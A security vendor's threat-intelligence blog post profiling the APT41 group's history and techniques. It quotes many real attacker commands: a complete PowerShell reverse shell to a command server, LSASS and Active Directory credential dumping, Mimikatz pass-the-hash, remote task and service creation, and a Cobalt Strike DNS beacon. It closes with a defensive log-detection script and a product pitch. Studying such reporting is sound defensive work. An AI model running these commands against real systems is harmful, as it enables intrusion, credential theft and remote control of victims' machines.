APT41 is a prolific and highly skilled threat actor, active since at least 2007, that distinguishes itself by conducting simultaneous cyber espionage and financially motivated cybercrime operations. This dual-focus, evident since 2014, targets a vast array of sectors, from U.S. state governments to global shipping, logistics, and technology companies. The group is known for its persistence, maintaining long-term unauthorized access for months or even years. A key characteristic of APT41 is its exceptional agility in weaponizing vulnerabilities. Notably, they began exploiting the critical Log4Shell (CVE-2021-44228) vulnerability against at least two U.S. state governments within hours of its public disclosure.
The group's tactics, techniques, and procedures (TTPs) demonstrate a high level of operational sophistication. Their primary initial access vector is the exploitation of public-facing applications, rapidly weaponizing both n-day and zero-day flaws in Citrix, Zoho, Cisco, and other software. Once inside, APT41 relies heavily on "living off the land," using a complex, multi-stage delivery process for payloads like Cobalt Strike that depends on built-in Windows utilities such as cmd.exe and certutil. They establish persistence through a variety of methods, including creating disguised Windows Services, deploying web shells, and using Scheduled Tasks. Their credential access is comprehensive: they use tools like Mimikatz to dump LSASS memory and built-in utilities like ntdsutil to steal the entire Active Directory database. To evade detection, they employ custom injectors to bypass logging, obfuscate their tools, and exfiltrate stolen data to legitimate cloud services like OneDrive to blend in with normal network traffic.
In this post, we will explore the major historical operations of APT41, highlight their notable campaigns against government and commercial sectors, and examine the group's tactics, techniques, and procedures to understand how they execute persistent cyber attacks. Finally, we will show how Picus helps defend against this group.
The threat actor utilizes various tools for actively scanning target organizations to find vulnerabilities. This includes using vulnerability scanners like Acunetix and network scanners such as Nmap for identifying open ports and services.
# Basic Nmap scan with service version detection
Hidden directories and subdomains are discovered by brute-forcing web directories with utilities including OneForAll, subdomain3, subDomainsBrute, and Sublist3r.
Specialized scanning is also performed. For instance, JexBoss is used to specifically find and exploit vulnerabilities within JBoss application servers [6].
# Example: Scanning a host for JBoss vulnerabilities
Exploiting public-facing applications is a primary initial access vector for this group, which demonstrates agility in weaponizing both n-day and zero-day vulnerabilities.
A mapping of exploited CVEs includes:
.NET deserialization attacks are conducted, frequently targeting ASP.NET applications. These attacks use malicious ViewStates created with the YSoSerial.NET tool to achieve code execution.
SQLmap is also launched in various attacks [6]:
python sqlmap.py -r [Company1_domain].txt --tamper=space2comment --random-agent -p ctl00%24ContentPlaceHolder1%24txtUserName,ctl00%24ContentPlaceHolder1%24txtPassword --os-shell
To gain initial compromise, spearphishing emails with malicious Compiled HTML (.chm) file attachments are used for the surgical targeting of specific individuals.
Windows Management Instrumentation (WMI) was also leveraged in several malicious campaigns for execution [6].
wmic /node:172.19.97.102 /user:{redacted}\{redacted} /password:P$ssw0rd0006 process call create "C:\users\Public\COMSysUpdate.exe"
The Task Scheduler is used to execute malicious files. This technique is applied both to machines where sessions are already established and to new machines identified during reconnaissance [6].
SCHTASKS /Create /S 192.168.100.19 /U "{redacted}\administrator" /P "!@#Virg0#@!" /RU SYSTEM /SC DAILY /TN Exec2022 /TR "C:\windows\system32\taskhosts.exe"
PowerShell is used to obtain a reverse shell. The code is executed in stealth mode, enabling the compromised device to communicate with a command-and-control server and allowing for remote command execution [6].
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('{redacted}', 80);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
A notably complex, multi-stage process involving the Windows Command Shell (cmd.exe) was employed to deploy the Cobalt Strike Beacon payload [6], ensuring a covert and intact delivery.
The rundll32.exe binary is used to execute malicious loaders and payloads.
Windows services are commonly leveraged as a mechanism for both execution and persistence. Services are created and started to run malicious executables or scripts, like install.bat. This technique was observed in the ColunmTK campaign [6].
sc \\<IP> Create SuperIe binPath= "cmd.exe /k c:\users\public\install.bat"
In one intrusion, a combination of ANTSWORD and BLUEBEAM web shells was deployed for persistence. These web shells were discovered on a Tomcat Apache Manager server and had been active since at least 2023. They were used to execute certutil.exe for downloading the DUSTPAN dropper, which in turn stealthily loaded the BEACON payload [5].
New Windows services are created to maintain persistence [6].
sc \\172.26.16.81 Create SuperIe binPath= "cmd.exe /k c:\users\public\SecurityHealthSystray.exe"
The DUSTPAN malware was also made persistent through services, with one instance being named "Windows Defend" to avoid detection.
In some instances, malicious files were placed in the Startup folder on remote machines. This action ensures the file executes every time the operating system boots [6].
copy C:\temp\LxpSvc.exe "\\192.168.100.4\c$\Users\administrator.{redacted}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LxpSvc.exe"
DLL side-loading was employed to execute the DUSTTRAP malware: a legitimate program, the AhnLab uninstaller, was abused to load the malicious DUSTTRAP payload. Other benign, code-signed Windows binaries were also used for this purpose.
To remain unnoticed in a victim's network, the threat actors used the well-known protection tool Themida to obfuscate their malicious files.
Encryption is used to hide malicious payloads from security products and analysis. The DUSTTRAP launcher was built to decrypt its payload using AES-128-CFB. Similarly, the DUSTPAN dropper was observed loading BEACON payloads that had been encrypted with ChaCha20.
Malware is disguised by naming it to match legitimate system files. For example, the DUSTPAN malware was observed being executed with names like w3wp.exe (a common IIS process) and conn.exe to blend in.
The group cleans up artifacts to hide its tracks, such as deleting database dumps after exfiltration.
Malicious files were likewise deleted from the host once they were no longer required [6].
del C:\temp\LxpSvc.exe
A more advanced variation involves the DUSTTRAP loader: it trojanizes a legitimate DLL in memory but then restores the original, clean file on disk. This is done to evade EDR solutions that perform scans "on file close."
File and directory permissions are modified, as seen in the following example [6].
icacls \\192.168.0.243\c$\www\{redacted}\test2.asp /grant IIS_IUSRS:F
The memory of the Local Security Authority Subsystem Service (LSASS) process is another source of credentials, as it handles user logons and access tokens. The utilities Procdump and Mimikatz are used to dump the memory of this process [6].
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
Account data is also extracted from the Security Account Manager (SAM) database, which stores local account passwords. Attackers attempt to copy this database, either from its registry location (HKLM\SAM\SAM) using the reg save command or by accessing the binary file (%WINDIR%\System32\Config\SAM) via volume shadow copies [6].
reg save HKLM\SAM C:\perflogs\sam.save
The Windows utility Ntdsutil was frequently used in 2021 campaigns. This tool is used to acquire a copy of the ntds.dit file, the Active Directory database, which contains user objects, group information, and password hashes for all domain users [6].
ntdsutil "ac i ntds" "ifm" "create full C:\perflogs\temp" q q
ntdsutil "activate instance ntds" "ifm" "create full C:\PerfLogs\temp" quit quit
A search is conducted across files and directories for strings containing keywords like "user" or "password" to find unsecured credentials [6].
findstr /c:"User" /c:"Password" /si web.config
A tool called BrowserGhost is used to obtain stored credentials from web browsers [6].
BrowserGhost.exe >> iis.txt
The registry is queried to find information such as current RDP port configurations or network settings [6].
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
Network configuration information is obtained by directly querying specific registry keys [6].
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{1f777394-0b42-11e3-80ad-806e6f6e6963}"
The Ping command, often within a FOR loop, is used with single echo requests to identify other live devices on the local network [6].
ping -n 1 PIST-FILE-SRV
The SETSPN utility is also used to discover which domain devices are running specific services, such as IIS, SQL, and MSSQL [6].
The publicly available tool cping is used to identify local computers that are vulnerable to SMB attacks [6].
C:\PerfLogs\cping40.exe scan smbvul 10.0.0.1 10.0.10.1 > 10.txt
The built-in netstat utility is used to identify active network connections [6].
netstat -ano
Reconnaissance is conducted on remote devices to determine if specific files, which had been previously downloaded, are currently running.
tasklist /pid 1428 /f
A list of users and computers within specific high-privilege Windows groups is obtained.
net group "Domain Admins" /domain
Basic system configuration information, such as the Windows version and system architecture, is gathered.
echo %PROCESSOR_ARCHITECTURE%
The Net utility is used to gather information about domain group memberships and collect lists of administrators.
net user /domain > 1.txt
The domain time is checked, often to synchronize malicious activities or understand logging timestamps.
net time /domain
Attempts are made to detect available network shares and drives [6].
net share
Domain trust relationships are enumerated.
dsquery site
The sekurlsa::pth module of Mimikatz is used to perform PtH attacks [6].
mimikatz sekurlsa::pth /user:Administrator /domain:{redacted} /ntlm:{redacted} /run:"%COMSPEC% /c echo 70c64df2976 > \\.\pipe\277bf3"
Tools and payloads are transferred to other systems on the network [6].
jump psexec64 {redacted} dns windows/beacon_dns/reverse_dns_txt (ns1.colunm.tk:53) on {redacted} via Service Control Manager (\\[redacted]\ADMIN$\c3632b3.exe)
Files are collected from the local system, including from volume shadow copies and the Windows logging system [6].
vssadmin list shadows
Data is compressed using an archiving utility before exfiltration, likely to reduce file size and evade detection. The rar utility was observed being used to archive data downloaded from internal Oracle databases.
A portable archiver (like 7z.exe) is often downloaded to the compromised device, used to archive the target files, and then the archive is exfiltrated [6].
7z.exe a syslog.7z Intl
In one case involving a software developer, access was gained to a private GitHub repository. This repository stored sensitive data, including credentials for remote servers, private certificates, and server lists [6].
shell git clone "ssh://jenkins@{redacted}:29418/DevOps/Playbook2"
Communication with C&C servers is established using HTTP and HTTPS listeners [6].
DNS tunnels are also used as a method to hide C&C communication [6].
A tool called FRPC is often used to proxy traffic during the attacks [6].
frcp.exe -c frcp.ini
Cobalt Strike is used to upload files onto compromised devices. In some targeted attacks, these files were uploaded from special directories named specifically for the victim organization [6].
upload C:\Users\Administrator\Desktop\cs\dns\COMSysUpdate.ocx
During the exfiltration stage, various server configurations, backup data, and user data were accessed and stolen [6].
download D:\projects\{redacted}\web.config;
Stolen data was exfiltrated to legitimate cloud services, specifically OneDrive, to blend in with normal network traffic. This was accomplished using PINEGROVE, a command-line tool designed to upload files to OneDrive using its API.
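Two of the network behaviours described above, the DNS TXT beacon channel (beacon_dns/reverse_dns_txt over ns1.colunm.tk) and bulk uploads to OneDrive from a server (PINEGROVE), leave distinctive shapes in DNS and proxy logs. The following is an added example, not Picus or Group-IB code; it assumes DNS records with client/qtype/qname fields and proxy records with client/host/bytes_out fields, the OneDrive host list is an assumption, and all records are constructed.

```python
"""Network-telemetry checks for two behaviours described in this post: DNS TXT
beaconing (Cobalt Strike beacon_dns/reverse_dns_txt) and bulk uploads to OneDrive
from servers (PINEGROVE). Added example, not Picus or Group-IB code. Assumes DNS
logs with client/qtype/qname and proxy logs with client/host/bytes_out fields;
every record below is constructed."""
from collections import defaultdict

# Assumed OneDrive API endpoints as seen by a proxy; adjust to your environment.
ONEDRIVE_HOSTS = {"graph.microsoft.com", "api.onedrive.com", "onedrive.live.com"}

def parent_domain(qname):
    """Last two labels of a name: 0001.ns1.colunm.tk -> colunm.tk."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])

def dns_txt_beaconing(dns_records, min_unique=20):
    """Flag (client, parent domain) pairs issuing TXT queries for many distinct
    subdomains, the shape of a DNS TXT command channel rather than SPF lookups."""
    names = defaultdict(set)
    for rec in dns_records:
        if rec["qtype"] == "TXT":
            names[(rec["client"], parent_domain(rec["qname"]))].add(rec["qname"].lower())
    return {key: len(n) for key, n in names.items() if len(n) >= min_unique}

def server_onedrive_uploads(proxy_records, server_ips, min_bytes=100 * 2**20):
    """Flag servers (which rarely have a reason to sync to OneDrive) that sent
    at least min_bytes to OneDrive API hosts."""
    sent = defaultdict(int)
    for rec in proxy_records:
        if rec["client"] in server_ips and rec["host"].lower() in ONEDRIVE_HOSTS:
            sent[rec["client"]] += rec["bytes_out"]
    return {ip: b for ip, b in sent.items() if b >= min_bytes}

# Constructed telemetry: 24 TXT lookups of unique labels under colunm.tk (the domain
# in the Cobalt Strike log quoted above) and a host doing repetitive SPF lookups.
DNS_RECORDS = [{"client": "192.0.2.50", "qtype": "TXT", "qname": f"{i:06x}.ns1.colunm.tk"} for i in range(24)]
DNS_RECORDS += [{"client": "192.0.2.51", "qtype": "TXT", "qname": "example.com"}] * 30
PROXY_RECORDS = [
    {"client": "10.0.0.5", "host": "graph.microsoft.com", "bytes_out": 150 * 2**20},
    {"client": "10.0.0.5", "host": "graph.microsoft.com", "bytes_out": 160 * 2**20},
    {"client": "10.0.0.77", "host": "graph.microsoft.com", "bytes_out": 50 * 2**20},
]
SERVERS = {"10.0.0.5"}  # constructed: an IIS server like the one hosting the web shells

if __name__ == "__main__":
    print(dns_txt_beaconing(DNS_RECORDS))
    print(server_onedrive_uploads(PROXY_RECORDS, SERVERS))
```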
We also strongly suggest simulating APT41 Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for APT41:
| Threat ID | Threat Name | Attack Module |
|---|---|---|
| 27065 | APT41 Threat Group Campaign Malware Email Threat | Network Infiltration |
| 25568 | APT41 Threat Group Campaign Malware Download Threat | Network Infiltration |
| 72247 | APT41 Threat Group Campaign | Windows Endpoint |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
APT41 is also known as: Wicked Panda, Brass Typhoon, BARIUM, Amoeba, BRONZE ATLAS, BRONZE EXPORT, Blackfly, Double Dragon, Earth Baku, G0044, G0096, Grayfly, HOODOO, LEAD, Leopard Typhoon, Red Kelpie, TA415, TG-2633, WICKED PANDA, WICKED SPIDER, Winnti, Pigfish.
References
[1] “APT41 Chinese Cyber Threat Group,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-dual-espionage-and-cyber-crime-operation
[2] Accessed: Nov. 11, 2025. [Online]. Available: https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf
[3] “APT41 Initiates Intrusion Campaign Using Multiple Exploits,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-initiates-global-intrusion-campaign-using-multiple-exploits/
[4] “APT41 Targeting U.S. State Government Networks,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-us-state-governments
[5] “APT41 Has Arisen From the DUST,” Google Cloud Blog. Accessed: Nov. 11, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust
[6] N. R. A. Head-ASM, TI, and DRP, “APT41 World Tour 2021 on a tight schedule,” Group-IB. Accessed: Nov. 14, 2025. [Online]. Available: https://www.group-ib.com/blog/apt41-world-tour-2021/